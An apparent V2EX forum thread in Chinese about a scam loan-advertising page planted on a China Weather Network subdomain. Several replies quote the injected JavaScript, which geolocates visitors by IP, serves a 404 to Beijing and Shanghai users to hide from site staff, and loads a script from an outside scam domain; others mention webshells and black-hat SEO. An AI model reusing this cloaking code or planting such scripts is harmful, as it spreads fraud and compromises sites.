V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
jichangee
V2EX  ›  生活

中国天气网域名下居然会有这样的页面

  •  4
     
  •   jichangee · 2022-11-24 16:19:07 +08:00 · 7371 次点击
    这是一个创建于 490 天前的主题,其中的信息可能已经有所发展或是发生改变。
    34 条回复    2022-11-29 16:12:01 +08:00
    SimonOne
        1
    SimonOne  
       2022-11-24 16:24:27 +08:00
    404
    Patrick1
        2
    Patrick1  
       2022-11-24 16:29:37 +08:00
    怎么那么像 b 乎呢
    czfy
        3
    czfy  
       2022-11-24 16:29:38 +08:00
    @SimonOne 可能要翻,是不是你有规则识别了 cn 页面不翻
    是一个套路以债抵债的宣传页,还做成了知乎问答的样式
    LZSZ
        4
    LZSZ  
       2022-11-24 16:30:10 +08:00   ❤️ 1
    @SimonOne 可以打开,应该是被黑了,插入一个类知乎的骗子广告页面。
    ZoeeoZ
        5
    ZoeeoZ  
       2022-11-24 16:31:02 +08:00
    @czfy 跟前几年的课本链接是黄网一样.应该是之前合作的厂商域名被买走了,这些地方也没人去维护
    SimonOne
        6
    SimonOne  
       2022-11-24 16:32:09 +08:00
    @czfy #3 代理看见了
    Xusually
        7
    Xusually  
       2022-11-24 16:38:32 +08:00   ❤️ 11
    骚操作

    页面里用 js 调用腾讯新闻的 ip 转地理位置接口来判断用户在哪个城市: https://r.inews.qq.com/api/ip2city?otype=jsonp&callback=callback&callback=wea_%20=&_=1652257980798

    然后如果用户 ip 是北京和上海的话,就跳中国天气网的 404 页面。
    if (wea_.city.indexOf('\u5317\u4eac\u5e02') != -1 ||wea_.city.indexOf('\u4e0a\u6d77\u5e02') != -1 ) {document.writeln("<frameset cols=\"100%\"><frame src=\"http://www.weather.com.cn/404\" ></frameset>
    Xusually
        8
    Xusually  
       2022-11-24 16:39:34 +08:00
    京沪用户查看就是 404 ,其他地区查看就是骗子页面,这逃避站长检查也真是粗糙。
    nosmile
        9
    nosmile  
       2022-11-24 16:48:41 +08:00
    heylogo
        10
    heylogo  
       2022-11-24 16:53:44 +08:00
    @nosmile #9 垃圾百度和 google 、bing 的差距显而易见了,垃圾百度啥都没有
    eason1874
        11
    eason1874  
       2022-11-24 17:20:30 +08:00
    见过很多次了,啥内容都有,有些跳 404 ,有些不跳,估计是做 SEO ,胡乱采集,连垃圾广告也采集上来了
    ye4241
        12
    ye4241  
       2022-11-24 17:31:48 +08:00
    图片的域名似乎都是 122law.com 的,看着是这个律师事务所提供的服务么。

    谷歌内容竟然全是卖翡翠的。。。

    fisherman0459
        13
    fisherman0459  
       2022-11-24 17:45:31 +08:00
    https://www.v2ex.com/t/883635
    中国天气网这是怎么了?
    pysex
        14
    pysex  
       2022-11-24 18:36:15 +08:00
    都有这样的内容 还不直接封域名?封服务器
    wbrobot
        15
    wbrobot  
       2022-11-24 19:11:00 +08:00   ❤️ 1
    @SimonOne

    <script type="text/javascript" src="https://r.inews.qq.com/api/ip2city?otype=jsonp&callback=callback&callback=wea_%20=&_=1652257980798"></script><script type="text/javascript">if (wea_.city.indexOf('\u5317\u4eac\u5e02') != -1 ||wea_.city.indexOf('\u4e0a\u6d77\u5e02') != -1 ) {document.writeln("<frameset cols=\"100%\"><frame src=\"http://www.weather.com.cn/404\" ></frameset>");
    document.title = '\u5929\u6c14\u7f51';} </script>
    <script src="https://tqwluodiye.baohongbao.net/yuqi/yuqi.js"></script>

    还限制了城市..估计怕官方看到, 哈哈哈哈
    WLW
        16
    WLW  
       2022-11-24 19:39:09 +08:00
    ICP 备案主体信息
    ICP 备案 /许可证号:京 ICP 证 010385 审核通过日期:2019-08-13
    主办单位名称:北京维艾思气象信息科技有限公司 主办单位性质:企业
    ICP 备案网站信息
    ICP 备案 /许可证号:京 ICP 证 010385-2 网站域名:weather.com.cn
    tcsky
        17
    tcsky  
       2022-11-24 19:42:26 +08:00   ❤️ 1
    运营商劫持, 黑产了. 网上有专门卖这种运营商流量的
    tcsky
        18
    tcsky  
       2022-11-24 19:43:12 +08:00
    @tcsky 我看错了 这个好像不是
    rrfeng
        19
    rrfeng  
       2022-11-24 19:44:21 +08:00
    明显是被劫持了。
    Biwood
        20
    Biwood  
       2022-11-24 20:49:24 +08:00
    这网站竟然还不支持 HTTPS
    manhere
        21
    manhere  
       2022-11-24 20:51:19 +08:00
    二级目录出租生意而已,全是诈骗在用
    046569
        22
    046569  
       2022-11-24 21:06:57 +08:00   ❤️ 2
    就是在做 SEO ,有些黑帽手法,并不是劫持流量,付费的价格超出很多人的想象。疫情当前,很多网站变现困难。
    我有客户也和他们合作,就是文中的正主。

    只有 @nosmile 、 @eason1874 、 @ye4241 判断正确。👍
    saigo
        23
    saigo  
       2022-11-24 21:21:25 +08:00
    黑帽 seo ,webshell ,挂外链。
    zyxk
        24
    zyxk  
       2022-11-24 22:04:57 +08:00
    zyxk
        25
    zyxk  
       2022-11-24 22:06:08 +08:00
    https://r.inews.qq.com/api/ip2city
    不知道有什么参数可以获取 ip4
    julyclyde
        26
    julyclyde  
       2022-11-25 08:50:54 +08:00
    lucybenz
        27
    lucybenz  
       2022-11-25 23:11:45 +08:00
    实测 是假装在做 seo 采集内容 实际给骗子做广告,列表中正常内容跳 404 。广告正常访问 有网贷逾期 有翡翠售卖
    francis59
        28
    francis59  
       2022-11-26 16:22:34 +08:00
    我说怎么跳 404 了,原来是做了地址判断,这些恶心的玩意其实还在
    maketime4life
        29
    maketime4life  
       2022-11-26 17:43:20 +08:00
    看了下,具体打开黑产广告的是这个脚本: https://tqwluodiye.baohongbao.net/yuqi/yuqi.js
    这个域名的备案信息都能查到,不怕被抓吗?
    aijialefu
        30
    aijialefu  
       2022-11-26 23:00:54 +08:00
    @maketime4life 备案都是买的 找不到真人的
    maketime4life
        31
    maketime4life  
       2022-11-26 23:46:09 +08:00
    @aijialefu #30 那要抓就这个人倒霉了。。。
    holyssss
        32
    holyssss  
       2022-11-27 09:21:46 +08:00 via Android
    黑产类 SEO ,谷歌一搜一点灰黑产关键字,大把的正规网站,gov 网企业网,都有这些个玩意
    maketime4life
        33
    maketime4life  
       2022-11-27 10:50:33 +08:00
    @holyssss #32 这已经不是光 SEO 了,还得把这些带 js 的垃圾网页放到这些网站的二级域名下,鬼知道他们是怎么把这些垃圾网页放进去的,要么有内鬼,要么就是被黑了
    holyssss
        34
    holyssss  
       2022-11-29 16:12:01 +08:00 via Android
    @maketime4life 批量扫漏洞关键字,绕过漏洞过后拿到 webshell 插入 js 。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   3012 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 38ms · UTC 15:01 · PVG 23:01 · LAX 08:01 · JFK 11:01
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.